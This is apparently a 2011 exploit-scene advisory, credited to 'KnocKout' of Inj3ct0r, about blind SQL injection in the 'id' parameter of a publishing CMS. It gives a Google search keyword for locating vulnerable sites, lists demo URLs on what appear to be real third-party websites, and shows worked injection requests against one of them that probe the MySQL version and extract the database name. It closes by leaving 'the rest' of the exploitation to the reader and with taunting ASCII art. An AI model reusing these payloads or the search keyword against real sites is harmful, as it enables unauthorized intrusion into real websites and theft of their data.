=========================================================
Publishing technology <= BLIND SQL Injection Vulnerabilities
===========================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KnocKout member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com - http://griadamlar.com
[~] Reference : http://h4x0resec.blogspot.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Publishing technology
|~Price : N/A
|~Version : N/A
|~Software: www.publishingtechnology.com
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /
|~Google Keyword : "Powered by Publishing technology AS"
|[~]Date : "24.04.2011"
|[~]Tested on :
Web Server: 	Microsoft-IIS/6.0
Powered-by: 	ASP.NET
DB Server: 	MySQL >=5
----------------------------------------------------------
Details.asp in 'id' Functions Not Security
CollectionContent.asp 'id' Functions Not Security

-- Demos.
http://www.la4o.net/Details.asp?id=4 
http://www.studiemotet.no/details.asp?id=120 
http://www.lesliedowney.no/CollectionContent.asp?id=24 
http://lesliedowney.no/CollectionContent.asp?id=24
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Explotation| Blind SQL Injection~~~~~~~~~~~}|
    
    Example
    
    Mysql Version?
    SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=4  {FALSE} 
    SQL Injecting Retry : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=5 {TRUE}
    
    Database name?
    SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and lenght((database()))<=6 and 'Inj3ct0r'='Inj3ct0r'
    Mysql Writes : [MySQL][ODBC 3.51 Driver][mysqld-5.0.17]FUNCTION leslie.lenght does not exist
    Database Name Found! : "leslie"
   
   
    the rest is up to you exploit.
    
    ================================================================
Got a present!! FOR EXPLOIT-DB Lamers.. ::):):):)

............../'' )
...........,/¯../
........../..../
.../´¯/'...'/´¯¯`•¸
./'/.../..../......./¨¯ \
('(...´...´.... ¯~/'...' )
.\.................'..... /
..'\'...\.......... _.•´
....\..............(
.....\........ 
---------------------------------------------------------------------

                .__        _____        _______                 
                |  |__    /  |  |___  __\   _  \_______   ____  
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \ 
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/ 
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/ 
                         _____________________________  
                        /   _____/\_   _____/\_   ___ \ 
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/ 
                                       &

__  ____/___  __ \___    |_ \/ /___  / / /___    |___  __/___  /
_  / __  __  /_/ /__  /| |__  / __  /_/ / __  /| |__  /   __  / 
/ /_/ /  _  _, _/ _  ___ |_  /  _  __  /  _  ___ |_  /    _  /__
\____/   /_/ |_|  /_/  |_|/_/   /_/ /_/   /_/  |_|/_/     /____/ 

        _____                        
__________  /_______ _________________
__  ___/_  __/_  __ `/__  ___/__  ___/
_(__  ) / /_  / /_/ / _  /    _(__  ) 
/____/  \__/  \__,_/  /_/     /____/  

          KaCaK - MUS4LLAT - ameN - KnocKout - TechnicaL - Neuromancer - MahseN